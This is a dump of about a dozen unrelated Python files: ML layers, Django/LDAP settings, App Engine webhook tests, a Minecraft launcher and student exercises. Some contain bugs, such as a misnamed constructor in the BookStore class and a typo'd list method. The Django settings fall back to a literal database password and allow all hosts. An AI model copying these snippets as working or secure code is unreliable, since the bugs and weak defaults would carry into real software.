TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('TPublishFilterResult') oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other)
nilq/baby-python
python
# 基于梯度下降的线性回归 # 线性回归方程: y = w1 * x + w0 * 1 # 用线性代数中的矩阵表述为: y = [w1, w0] * [x, 1]T # 目标:使用梯度下降的方法,根据样本数据,反复迭代获取最佳的 w0,w1。最后得到目标方程。 # 数据 bread_price = [[0.5,5],[0.6,5.5],[0.8,6],[1.1,6.8],[1.4,7]] # 更新一次 w0, w1 的值 BGD(Batch Gradient Descent,批量梯度下降法) def BGD_step_gradient(w0_current, w1_current, points, learninggRate): w0_gradient = 0 w1_gradient = 0 # 遍历所有样本数据,计算 grad(w0), grad(w1) # grad(Wi) = -1 * sum((target(d) - output(d)) * Xi(d)) Xi(d): Wi 对应的系数,如 w1 对应 x, w0 对应 1. for i in range(len(points)): x = points[i][0] y = points[i][1] #计算当前的梯度 w0_gradient += -1.0 * (y - ((w1_current * x) + w0_current)) w1_gradient += -1.0 * x * (y - ((w1_current * x) + w0_current)) # Wi <-- Wi + n * sum((target(d) - output(d)) * Xi(d)) n: learninggRate new_w0 = w0_current - (learninggRate * w0_gradient) new_w1 = w1_current - (learninggRate * w1_gradient) return [new_w0, new_w1] # 梯度下降算法 def gradient_descent_runner(points, start_w0, start_w1, l_rate, num_iterations): w0 = start_w0 w1 = start_w1 for i in range(num_iterations): w0, w1 = BGD_step_gradient(w0, w1, points, l_rate) return [w0, w1] def predict(w0, w1, wheat): price = w1 * wheat + w0 return price if __name__ == "__main__": learning_rate = 0.01 # 学习率 num_iter = 100 # 迭代次数 w0, w1 = gradient_descent_runner(bread_price, 1, 1, learning_rate, num_iter) price = predict(w0, w1, 0.9) # 预测 0.9 磅面包的价格。 print("price = ", price)
nilq/baby-python
python
#!/usr/bin/env python3 import glooey import pyglet pyglet.font.add_file('Lato-Regular.ttf') pyglet.font.load('Lato Regular') class WesnothLabel(glooey.Label): custom_font_name = 'Lato Regular' custom_font_size = 10 custom_color = '#b9ad86' custom_alignment = 'center' window = pyglet.window.Window() gui = glooey.Gui(window) label = WesnothLabel('Hello world!') gui.add(label) pyglet.app.run()
nilq/baby-python
python
import numpy as np import torch import torch.nn as nn import torch.nn.functional as F class Norm(nn.Module): """ Graph Normalization """ def __init__(self, norm_type, hidden_dim=64): super().__init__() if norm_type == 'bn': self.norm = nn.BatchNorm1d(hidden_dim) elif norm_type == 'gn': self.norm = norm_type self.weight = nn.Parameter(torch.ones(hidden_dim)) self.bias = nn.Parameter(torch.zeros(hidden_dim)) self.mean_scale = nn.Parameter(torch.ones(hidden_dim)) def compute_norm(self,x,dim=0): eps = 1e-6 mean = x.mean(dim = dim, keepdim = True) var = x.std(dim = dim, keepdim = True) x = (x - mean) / (var + eps) return x def forward(self, x): if self.norm is not None and type(self.norm) != str: x_norm = [] for i in range(x.size(0)): x_norm.append(self.compute_norm(self.compute_norm(x[i,:,:],dim=1),dim=0).unsqueeze(0)) x = torch.cat(x_norm,dim=0) return x elif self.norm is None: return x bs, k, c = x.size() batch_list = torch.tensor(1).repeat(bs).long().to(x.device) batch_index = torch.arange(bs).to(x.device).repeat_interleave(batch_list) batch_index = batch_index.view((-1,) + (1,) * (x.dim() - 1)).expand_as(x) mean = torch.zeros(bs, *x.shape[1:]).to(x.device) mean = mean.scatter_add_(0, batch_index, x) mean = (mean.T / batch_list).T mean = mean.repeat_interleave(batch_list, dim=0) sub = x - mean * self.mean_scale std = torch.zeros(bs, *x.shape[1:]).to(x.device) std = std.scatter_add_(0, batch_index, sub.pow(2)) std = ((std.T / batch_list).T + 1e-6).sqrt() std = std.repeat_interleave(batch_list, dim=0) x_norm = self.weight * sub / std + self.bias return x_norm class GraphEncoderDecoderAttention(nn.Module): def __init__(self, nhid, nheads, dropout, norm_type='bn', alpha=0.1, decoder_attn='ctx'): super(GraphEncoderDecoderAttention, self).__init__() self.dropout = dropout self.nhid = nhid self.nheads = nheads self.graph_attentions = [GraphEncoderDecoderAttentionLayer(nhid, nhid, nhid//nheads, dropout=dropout, alpha=alpha, concat=True) for _ in range(nheads)] for i, attention in enumerate(self.graph_attentions): self.add_module('attention_{}'.format(i), attention) self.linear = nn.Linear(nhid, nhid) self.norm1 = Norm(norm_type,nhid) self.norm2 = Norm(norm_type,nhid) self.activation = F.leaky_relu self.graph_multihead_attn = nn.MultiheadAttention(nhid, nheads, dropout=dropout) self.decoder_attention = decoder_attn def forward(self, x, ctx_with_pos, ctx,src, adj): x = F.dropout(x, self.dropout) ctx = F.dropout(ctx, self.dropout) x = x + torch.cat([att(x,ctx_with_pos,adj) for att in self.graph_attentions],dim=2) x = self.linear(self.norm1(x)) x = F.dropout(x,self.dropout) x = self.norm2(x) x = x.permute(1,0,2) ctx_with_pos = ctx_with_pos.permute(1,0,2) ctx = ctx.permute(1,0,2) x = self.graph_multihead_attn(x,ctx_with_pos,value=ctx)[0] x = x.permute(1,0,2) return x class GraphSelfAttention(nn.Module): def __init__(self, nhid, nheads, dropout, norm_type='bn', alpha=0.1): """Dense version of GAT.""" super(GraphSelfAttention, self).__init__() self.dropout = dropout self.nhid = nhid self.nheads = nheads self.graph_attentions = [GraphAttentionLayer(nhid, nhid//nheads, dropout=dropout, alpha=alpha, concat=True) for _ in range(nheads)] for i, attention in enumerate(self.graph_attentions): self.add_module('attention_{}'.format(i), attention) self.linear = nn.Linear(nhid, nhid) self.graph_self_attn = nn.MultiheadAttention(nhid, nheads, dropout=dropout) self.norm1 = Norm(norm_type,nhid) self.norm2 = Norm(norm_type,nhid) self.activation = F.leaky_relu def forward(self, x, src, adj): x = F.dropout(x, self.dropout) x_att = [] e_att = [] for att in self.graph_attentions: node,edge = att(x,adj) x_att.append(node) e_att.append(edge) x = x + torch.cat(x_att,dim=2) e = torch.sum(torch.stack(e_att),dim=0)/len(x_att) x = self.linear(self.norm1(x)) x = F.dropout(x,self.dropout) x = self.norm2(x) x = x.permute(1,0,2) x = self.graph_self_attn(x,x,value=src)[0] x = x.permute(1,0,2) return x, e class GraphEncoderDecoderAttentionLayer(nn.Module): """ Graph-to-Graph message passing, adapted from https://arxiv.org/abs/1710.10903 """ def __init__(self, in_src_features, in_tgt_features, out_features, dropout, alpha, concat=True): super(GraphEncoderDecoderAttentionLayer, self).__init__() self.dropout = dropout self.in_src_features = in_src_features self.in_tgt_features = in_tgt_features self.out_features = out_features self.alpha = alpha self.concat = concat self.Ws = nn.Parameter(torch.empty(size=(in_src_features, out_features))) self.Wt = nn.Parameter(torch.empty(size=(in_tgt_features, out_features))) nn.init.xavier_uniform_(self.Ws.data, gain=1.414) nn.init.xavier_uniform_(self.Wt.data, gain=1.414) self.a = nn.Parameter(torch.empty(size=(2*out_features, 1))) nn.init.xavier_uniform_(self.a.data, gain=1.414) self.leakyrelu = nn.LeakyReLU(self.alpha) def forward(self, h, ctx, adj): Ws_ctx = torch.bmm(ctx, self.Ws.repeat(ctx.size(0),1,1)) Wt_h = torch.bmm(h, self.Wt.repeat(h.size(0),1,1)) a_input = self._prepare_attentional_mechanism_input(Ws_ctx, Wt_h) e = self.leakyrelu(torch.matmul(a_input, self.a).squeeze(3)) zero_vec = -9e15*torch.ones_like(e) attention = torch.where(adj > 0, e, zero_vec) attention = F.softmax(attention, dim=2) attention = F.dropout(attention, self.dropout, training=self.training) h_prime = torch.matmul(attention, Ws_ctx) h_prime = F.leaky_relu(h_prime) return h_prime def _prepare_attentional_mechanism_input(self, Ws_ctx, Wt_h): Ns = Ws_ctx.size()[1] # number of nodes Nt = Wt_h.size()[1] # number of nodes # Below, two matrices are created that contain embeddings in their rows in different orders. # (e stands for embedding) # These are the rows of the first matrix (Wh_repeated_in_chunks): # e1, e1, ..., e1, e2, e2, ..., e2, ..., eN, eN, ..., eN # '-------------' -> N times '-------------' -> N times '-------------' -> N times # # These are the rows of the second matrix (Wh_repeated_alternating): # e1, e2, ..., eN, e1, e2, ..., eN, ..., e1, e2, ..., eN # '----------------------------------------------------' -> N times # Ws_ctx_repeated_in_chunks = Ws_ctx.repeat_interleave(Nt, dim=1) Wt_h_repeated_alternating = Wt_h.repeat([1,Ns,1]) # Wh_repeated_in_chunks.shape == Wh_repeated_alternating.shape == (N * N, out_features) # The all_combination_matrix, created below, will look like this (|| denotes concatenation): # e1 || e1 # e1 || e2 # e1 || e3 # ... # e1 || eN # e2 || e1 # e2 || e2 # e2 || e3 # ... # e2 || eN # ... # eN || e1 # eN || e2 # eN || e3 # ... # eN || eN all_combinations_matrix = torch.cat([Ws_ctx_repeated_in_chunks, Wt_h_repeated_alternating], dim=2) return all_combinations_matrix.view(Ws_ctx.size(0),Nt, Ns, 2 * self.out_features) class GraphAttentionLayer(nn.Module): """ Simple GAT layer, similar to https://arxiv.org/abs/1710.10903 """ def __init__(self, in_features, out_features, dropout, alpha, concat=True): super(GraphAttentionLayer, self).__init__() self.dropout = dropout self.in_features = in_features self.out_features = out_features self.alpha = alpha self.concat = concat self.W = nn.Parameter(torch.empty(size=(in_features, out_features))) nn.init.xavier_uniform_(self.W.data, gain=1.414) self.a = nn.Parameter(torch.empty(size=(2*out_features, 1))) nn.init.xavier_uniform_(self.a.data, gain=1.414) self.leakyrelu = nn.LeakyReLU(self.alpha) def forward(self, h, adj): Wh = torch.bmm(h, self.W.repeat(h.size(0),1,1)) a_input = self._prepare_attentional_mechanism_input(Wh) e = self.leakyrelu(torch.matmul(a_input, self.a).squeeze(3)) zero_vec = -9e15*torch.ones_like(e) attention = torch.where(adj > 0, e, zero_vec.to(h.device)) attention = F.softmax(attention, dim=2) attention = F.dropout(attention, self.dropout, training=self.training) h_prime = torch.matmul(attention, Wh) h_prime = F.leaky_relu(h_prime) return h_prime, attention def _prepare_attentional_mechanism_input(self, Wh): N = Wh.size()[1] # number of nodes # Below, two matrices are created that contain embeddings in their rows in different orders. # (e stands for embedding) # These are the rows of the first matrix (Wh_repeated_in_chunks): # e1, e1, ..., e1, e2, e2, ..., e2, ..., eN, eN, ..., eN # '-------------' -> N times '-------------' -> N times '-------------' -> N times # # These are the rows of the second matrix (Wh_repeated_alternating): # e1, e2, ..., eN, e1, e2, ..., eN, ..., e1, e2, ..., eN # '----------------------------------------------------' -> N times # Wh_repeated_in_chunks = Wh.repeat_interleave(N, dim=1) Wh_repeated_alternating = Wh.repeat([1,N,1]) # Wh_repeated_in_chunks.shape == Wh_repeated_alternating.shape == (N * N, out_features) # The all_combination_matrix, created below, will look like this (|| denotes concatenation): # e1 || e1 # e1 || e2 # e1 || e3 # ... # e1 || eN # e2 || e1 # e2 || e2 # e2 || e3 # ... # e2 || eN # ... # eN || e1 # eN || e2 # eN || e3 # ... # eN || eN all_combinations_matrix = torch.cat([Wh_repeated_in_chunks, Wh_repeated_alternating], dim=2) return all_combinations_matrix.view(Wh.size(0), N, N, 2 * self.out_features)
nilq/baby-python
python
import ldap import os BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) ARCHIVE_API = { 'DATASET_ARCHIVE_ROOT': os.getenv('DATASET_ARCHIVE_ROOT', os.path.join(BASE_DIR, 'archives')), 'DATASET_ARCHIVE_URL': '/archives/', # not used 'DATASET_ADMIN_MAX_UPLOAD_SIZE': 2147483648, # in bytes 'DATASET_USER_MAX_UPLOAD_SIZE': 1073741824, # in bytes 'EMAIL_NGEET_TEAM': (os.getenv('EMAIL_NGEET_TEAM'),), 'EMAIL_SUBJECT_PREFIX' : os.getenv('EMAIL_SUBJECT_PREFIX', '[ngt-archive]') } GOOGLE_MAPS_KEY = os.getenv('GOOGLE_MAPS_KEY') FILE_UPLOAD_PERMISSIONS = 0o660 FILE_UPLOAD_TEMP_DIR = os.path.join(os.getenv('FILE_UPLOAD_TEMP_DIR', '/tmp')) EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend' EMAIL_HOST = 'smtp.lbl.gov' EMAIL_PORT = 25 DEFAULT_FROM_EMAIL = 'NGEE Tropics Archive <no-reply@ngt-dev.lbl.gov>' # django app running behind a reverse proxy SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https') USE_X_FORWARDED_HOST = True SESSION_COOKIE_SECURE = True CSRF_COOKIE_SECURE = True # Uncomment for Production (using a reverse proxy) DEBUG = False ALLOWED_HOSTS = ['*'] # A list of all the people who get code error notifications. When DEBUG=False # and a view raises an exception, Django will email these people with the full # exception information. Each item in the list should be a tuple of (Full name, # email address). ADMINS = (('NGEE Tropics Admin', os.getenv('ADMIN_EMAIL')),) # A list in the same format as ADMINS that specifies who should get broken link MANAGERS = ADMINS SECRET_KEY = os.getenv('SECRET_KEY', None) # Database # https://docs.djangoproject.com/en/1.9/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': os.getenv('SQL_ENGINE', 'django.db.backends.sqlite3'), 'NAME': os.getenv('SQL_DATABASE', os.path.join(BASE_DIR, 'db.sqlite3')), 'USER': os.getenv('SQL_USER', 'wfsfa'), 'PASSWORD': os.getenv('SQL_PASSWORD', 'password'), 'HOST': os.getenv('SQL_HOST', 'localhost'), 'PORT': os.getenv('SQL_PORT', '5432'), } } # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.6/howto/static-files/ import os STATIC_ROOT = os.getenv('STATIC_ROOT','static/') STATIC_URL = '/static/' STATICFILES_DIRS = ( ) ##################### # LDAP configuration ##################### AUTH_LDAP_SERVER_URI = os.getenv('AUTH_LDAP_SERVER_URI') AUTH_LDAP_CONNECTION_OPTIONS = { ldap.OPT_REFERRALS: 0 } from django_auth_ldap.config import LDAPSearch AUTH_LDAP_BIND_DN = os.getenv('AUTH_LDAP_BIND_DN') AUTH_LDAP_BIND_PASSWORD = os.getenv('AUTH_LDAP_BIND_PASSWORD') AUTH_LDAP_USER_SEARCH = LDAPSearch(os.getenv('AUTH_LDAP_USER_SEARCH'), ldap.SCOPE_SUBTREE, "(&(objectClass=user)(sAMAccountName=%(user)s))") AUTH_LDAP_CACHE_GROUPS = True AUTH_LDAP_GROUP_CACHE_TIMEOUT = 300 AUTH_LDAP_USER_ATTR_MAP = { "first_name": "givenName", "last_name": "sn", "email": "mail" } # Keep ModelBackend around for per-user permissions and maybe a local # superuser. AUTHENTICATION_BACKENDS = ( 'archive_api.backends.LDAPBackend', 'archive_api.backends.ModelBackend', 'archive_api.backends.OAuth2Backend', )
nilq/baby-python
python
from django.conf.urls import url from ClassView import views from ClassView.views import check_ip urlpatterns = [ #方案1 直接在路由中进行装饰 # url(r'^post2$', check_ip(views.PostView.as_view())), url(r'^post2$', views.PostView.as_view()), url(r'^index$',views.index), url(r'^block$',views.block) ]
nilq/baby-python
python
#BookStore class Book: def __init___(self, pages, price, author, id1, title): self.pages = pages self.price = price self.author = author self.id1 = id1 self.title = title class BookStore: def __init__(self, book_store_name, book_list): self.book_list = book_list self.book_store_name = book_store_name def find_minimum_team_by_Id(self): minim = 999999 obj = None for each in self.book_list: if each.id1 < minim: minim = each.id1 obj = each return obj def sort_book_by_Id(self): l = [] for each in self.book_list: l.apped(each.id1) return sorted(l) if len(l)!=0 else None n = int(input()) l = [] for i in range(n): pages = int(input()) price = int(input()) author = input() id1 = int(input()) title = input() l.append(Book(pages,price,author,id1,title)) obj = BookStore("",l) x = obj.find_minimum_team_by_Id() if x == None: print("No Data Found") else: print(x.pages) print(x.price) print(x.author) print(x.id1) print(x.title) y = obj.sort_book_by_Id() if y == None: print("No Data Found") else: for i in y: print(i)
nilq/baby-python
python
import math def area_circle( r ): area = (math.pi * (r ** 2)) return area def volume_sphere( r ): volume = ((4/3) * math.pi) * (r ** 3) return volume #MAIN radius = float(input("Enter a radius:")) #call the area function radius_circle = area_circle(radius) print(f'The area of the circle is {radius_circle:.2f}') #call the volume function radius_sphere = volume_sphere(radius) print(f'The volume of the sphere is {radius_sphere:.2f}') #print the result
nilq/baby-python
python
# -*- coding: utf-8 -*- """Flask extensions that can be lazily accessed before instantiation of the web application.""" from flasgger import Swagger from flask_sqlalchemy import SQLAlchemy from embeddingdb.version import VERSION __all__ = [ 'db', 'swagger', ] db = SQLAlchemy() swagger_config = Swagger.DEFAULT_CONFIG.copy() swagger_config.update({ 'title': 'Embedding Database API', 'description': 'This exposes the functions of embeddingdb as a RESTful API', 'contact': { 'responsibleOrganization': 'Fraunhofer SCAI', 'responsibleDeveloper': 'Charles Tapley Hoyt', 'email': 'charles.hoyt@scai.fraunhofer.de', 'url': 'https://www.scai.fraunhofer.de/de/geschaeftsfelder/bioinformatik.html', }, 'version': VERSION, 'specs_route': '/' }) swagger = Swagger(config=swagger_config)
nilq/baby-python
python
# Copyright (c) 2014-2016, Intel Corporation All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # 1. Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # # 2. Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # # 3. Neither the name of the copyright holder nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS # IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED # TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A # PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED # TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR # PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF # LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING # NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS # SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. from __future__ import print_function import sys import os import platform import subprocess from pymic.offload_error import OffloadError from pymic._misc import _debug as debug from pymic._misc import _config as config from pymic._engine import pymic_library_load from pymic._engine import pymic_library_unload from pymic._engine import pymic_library_find_kernel # retrieve the installation path of the module pymic_dir = os.path.dirname(os.path.abspath(__file__)) class OffloadLibrary: """Manages loaded shared-object libraries with offload code on target devices. For each kernel of the library, the instance provides an attribute that can be used with invoke """ _library = None _tempfile = None _handle = None _device = None _device_id = None @staticmethod def _check_k1om(library): if platform.system() == 'Windows': # If we're running on a Windows machine, the .so # is expected to be a MIC native .so file. return True # Use readelf to detect the architecture flag of the .so # file to make sure we are only finding MIC native ones. p = subprocess.Popen(["readelf", '-h', library], stdout=subprocess.PIPE, stderr=subprocess.PIPE) out, err = p.communicate() if not isinstance(out, str): out = str(out, 'ascii') # look for architecture flags # ('<unknown>' for older versions of binutils) return out.find('<unknown>: 0xb5') > 0 or out.find('Intel K1OM') > 0 @staticmethod def _find_library(library): if os.path.isabs(library) and OffloadLibrary._check_k1om(library): abspath = library else: path_list = [pymic_dir] path_list.extend(config._search_path.split(os.pathsep)) for path in path_list: debug(5, " looking for {0} in {1}", library, path) abspath = os.path.join(path, library) if (os.path.isfile(abspath) and OffloadLibrary._check_k1om(abspath)): break else: return return abspath def __init__(self, library, device=None): """Initialize this OffloadLibrary instance. This function is not to be called from outside pymic. """ # safety checks assert device is not None # bookkeeping self._library = library self._device = device self._device_id = device._map_dev_id() self.unloader = pymic_library_unload self._cache = {} # locate the library on the host file system debug(5, "searching for {0} in {1}", library, config._search_path) filename = OffloadLibrary._find_library(library) if filename is None: debug(5, "no suitable library found for '{0}'", library) raise OffloadError("Cannot find library '{0}' " "in PYMIC_LIBRARY_PATH".format(library)) # load the library and memorize handle debug(5, "loading '{0}' on device {1}", filename, self._device_id) self._handle, self._tempfile = pymic_library_load(self._device_id, filename) debug(5, "successfully loaded '{0}' on device {1} with handle 0x{2:x}", filename, self._device_id, self._handle) def __del__(self): # unload the library on the target device if self._handle is not None: self.unloader(self._device_id, self._handle, self._tempfile) def __repr__(self): return "OffloadLibrary('{0}'@0x{1:x}@mic:{2})".format(self._library, self._handle, self._device_id) def __str__(self): return "OffloadLibrary('{0}'@0x{1:x}@mic:{2})".format(self._library, self._handle, self._device_id) def __getattr__(self, attr): funcptr = self._cache.get(attr, None) if funcptr is None: funcptr = pymic_library_find_kernel(self._device_id, self._handle, attr) self._cache[attr] = funcptr return attr, funcptr, self._device, self
nilq/baby-python
python
import time import logging import numpy as np # from scipy.optimize import brent # from math import gcd # from qcodes import Instrument from qcodes.utils import validators as vals # from qcodes.instrument.parameter import ManualParameter from pycqed.analysis import analysis_toolbox as atools # from pycqed.utilities.general import add_suffix_to_dict_keys from pycqed.measurement import detector_functions as det # from pycqed.measurement import composite_detector_functions as cdet # from pycqed.measurement import mc_parameter_wrapper as pw from pycqed.measurement import sweep_functions as swf # from pycqed.measurement import awg_sweep_functions as awg_swf # from pycqed.analysis import measurement_analysis as ma # from pycqed.measurement.calibration_toolbox import mixer_carrier_cancellation_5014 # from pycqed.measurement.calibration_toolbox import mixer_carrier_cancellation_UHFQC # from pycqed.measurement.calibration_toolbox import mixer_skewness_calibration_5014 # from pycqed.measurement.optimization import nelder_mead from pycqed.analysis import analysis_toolbox as a_tools # import pycqed.measurement.pulse_sequences.single_qubit_tek_seq_elts as sq import logging import numpy as np from copy import deepcopy,copy import qcodes as qc from qcodes.instrument.base import Instrument from qcodes.utils import validators as vals from qcodes.instrument.parameter import ManualParameter from pycqed.instrument_drivers.pq_parameters import InstrumentParameter class Current_Source_ER_88027(Instrument): # Instruments will be a list of RemoteInstrument objects, which can be # given to a server on creation but not later on, so it needs to be # listed in shared_kwargs def __init__(self, name, Keithley_Vsource, Keithley_instr, **kwargs): super().__init__(name, **kwargs) self.keithley = Keithley_instr self.Vsource = Keithley_Vsource self.max_I = 10. #A self.max_V = 6. #V Keithley_Vsource.seti(10e-3) self.add_parameter('I', set_cmd=self._set_I, get_cmd=self._get_I, label='Current', vals=vals.Numbers(max_value=self.max_I), unit='A') def _get_I(self): return convert_I(self.keithley.amplitude()) def _set_I(self,value): self.Vsource.setv(value) time.sleep(0.250) def seti(self,value): self.I(value) def measurei(self): return self.I() def measureR(self): eps = 1e-4 if abs(self.I()-0)>eps: return 0.3 else: return 0.3 def convert_I(dacV): return dacV
nilq/baby-python
python
def word2byte_array(array): assert len(array) == 32 res = [] for word in array: assert word >= 0 assert word <= 0xffff res.append(word & 0xff) res.append(word >> 8) return res def avx512_dwords(array): assert len(array) == 64 dwords = [] for i in range(0, 64, 4): b0 = array[i + 0] b1 = array[i + 1] b2 = array[i + 2] b3 = array[i + 3] dword = (b3 << 24) | (b2 << 16) | (b1 << 8) | b0 dwords.append(dword) return dwords indent = ' ' * 4 def avx512_const(array): dwords = avx512_dwords(array) lo = ', '.join('0x%08x' % v for v in dwords[:8]) hi = ', '.join('0x%08x' % v for v in dwords[8:]) return f"_mm512_setr_epi32(\n{indent}{lo},\n{indent}{hi}\n);" def avx512_var(name, array): dwords = avx512_dwords(array) lo = ', '.join('0x%08x' % v for v in dwords[:8]) hi = ', '.join('0x%08x' % v for v in dwords[8:]) return f"{indent}const __m512i {name} = _mm512_setr_epi32(\n" \ f"{indent}{indent}{lo},\n" \ f"{indent}{indent}{hi}\n" \ f"{indent});"
nilq/baby-python
python
#!/usr/bin/env python # Copyright 2016 The Kubernetes Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # pylint: disable=no-self-use """ To run these tests: $ pip install webtest nosegae $ nosetests --with-gae --gae-lib-root ~/google_appengine/ """ import json import unittest import webtest from google.appengine.ext import deferred from google.appengine.ext import testbed import handlers import main import models import secrets app = webtest.TestApp(main.app) class TestBase(unittest.TestCase): def init_stubs(self): self.testbed.init_memcache_stub() self.testbed.init_app_identity_stub() self.testbed.init_urlfetch_stub() self.testbed.init_blobstore_stub() self.testbed.init_datastore_v3_stub() self.testbed.init_taskqueue_stub() class AppTest(TestBase): def setUp(self): self.init_stubs() self.taskqueue = self.testbed.get_stub(testbed.TASKQUEUE_SERVICE_NAME) secrets.put('github_webhook_secret', 'some_secret', per_host=False) def get_response(self, event, body): if isinstance(body, dict): body = json.dumps(body) signature = handlers.make_signature(body) resp = app.post('/webhook', body, {'X-Github-Event': event, 'X-Hub-Signature': signature}) for task in self.taskqueue.get_filtered_tasks(): deferred.run(task.payload) return resp def test_webhook(self): self.get_response('test', {'action': 'blah'}) hooks = list(models.GithubWebhookRaw.query()) self.assertEqual(len(hooks), 1) self.assertIsNotNone(hooks[0].timestamp) def test_webhook_bad_sig(self): body = json.dumps({'action': 'blah'}) signature = handlers.make_signature(body + 'foo') app.post('/webhook', body, {'X-Github-Event': 'test', 'X-Hub-Signature': signature}, status=400) def test_webhook_missing_sig(self): app.post('/webhook', '{}', {'X-Github-Event': 'test'}, status=400) def test_webhook_unicode(self): self.get_response('test', {'action': u'blah\u03BA'}) def test_webhook_status(self): args = { 'name': 'owner/repo', 'sha': '1234', 'context': 'ci', 'state': 'success', 'target_url': 'http://example.com', 'description': 'passed the tests!', 'created_at': '2016-07-07T01:58:09Z', 'updated_at': '2016-07-07T02:03:12Z', } self.get_response('status', args) statuses = list(models.GHStatus.query_for_sha('owner/repo', '1234')) self.assertEqual(len(statuses), 1) status = statuses[0] args['repo'] = args.pop('name') for key, value in args.iteritems(): status_val = getattr(status, key) try: status_val = status_val.strftime('%Y-%m-%dT%H:%M:%SZ') except AttributeError: pass assert status_val == value, '%r != %r' % (getattr(status, key), value) PR_EVENT_BODY = { 'repository': {'full_name': 'test/test'}, 'pull_request': { 'number': 123, 'head': {'sha': 'cafe'}, 'updated_at': '2016-07-07T02:03:12Z', 'state': 'open', 'user': {'login': 'rmmh'}, 'assignees': [{'login': 'spxtr'}], 'title': 'test pr', }, 'action': 'opened', } def test_webhook_pr_open(self): body = json.dumps(self.PR_EVENT_BODY) self.get_response('pull_request', body) digest = models.GHIssueDigest.get('test/test', 123) self.assertTrue(digest.is_pr) self.assertTrue(digest.is_open) self.assertEqual(digest.involved, ['rmmh', 'spxtr']) self.assertEqual(digest.payload['title'], 'test pr') self.assertEqual(digest.payload['needs_rebase'], False) def test_webhook_pr_open_and_status(self): self.get_response('pull_request', self.PR_EVENT_BODY) self.get_response('status', { 'repository': self.PR_EVENT_BODY['repository'], 'name': self.PR_EVENT_BODY['repository']['full_name'], 'sha': self.PR_EVENT_BODY['pull_request']['head']['sha'], 'context': 'test-ci', 'state': 'success', 'target_url': 'example.com', 'description': 'woop!', 'created_at': '2016-07-07T01:58:09Z', 'updated_at': '2016-07-07T02:03:15Z', }) digest = models.GHIssueDigest.get('test/test', 123) self.assertEqual(digest.payload['status'], {'test-ci': ['success', 'example.com', 'woop!']})
nilq/baby-python
python
#!/usr/local/bin/python3 -u import minecraft_launcher_lib as mll import subprocess # Minecraft version mc_version = "1.18.1-rc2" # Asset index is same but without final revision asset_index = "1.18" # Your email, username and password below login = "yourEmailUsername" password = "seekritPasswordHere" # Get Minecraft directory mc_directory = mll.utils.get_minecraft_directory() libdir = mc_directory + "/libraries/" lwjgl3_libs = '/usr/local/share/lwjgl3/lwjgl.jar:' \ + '/usr/local/share/lwjgl3/lwjgl-openal.jar:' \ + '/usr/local/share/lwjgl3/lwjgl-opengl.jar:' \ + '/usr/local/share/lwjgl3/lwjgl-glfw.jar:' \ + '/usr/local/share/lwjgl3/lwjgl-stb.jar:' \ + '/usr/local/share/lwjgl3/lwjgl-tinyfd.jar:' \ + '/usr/local/share/lwjgl3/lwjgl-natives-openbsd.jar:' \ + '/usr/local/share/lwjgl3/lwjgl-opengl-natives-openbsd.jar:' \ + '/usr/local/share/lwjgl3/lwjgl-tinyfd-natives-openbsd.jar:' \ + '/usr/local/share/lwjgl3/lwjgl-stb-natives-openbsd.jar:' # Make sure the desired version of Minecraft is installed print("Installing version " + mc_version + " if needed... ", end="") mll.install.install_minecraft_version(mc_version,mc_directory) print("Done") # Login print("Logging in... ", end="") login_data = mll.account.login_user( login, password ) print("Done") # Useful figuring out new minecraft versions # Get Minecraft command #options = { # "username": login_data["selectedProfile"]["name"], # "uuid": login_data["selectedProfile"]["id"], # "token": login_data["accessToken"] #} #minecraft_command = mll.command.get_minecraft_command(mc_version,mc_directory,options) #print(minecraft_command) username = login_data["selectedProfile"]["name"] uuid = login_data["selectedProfile"]["id"] token = login_data["accessToken"] real_command = [ '/usr/local/jdk-17/bin/java', '-Xms2G', '-Xmx3G', 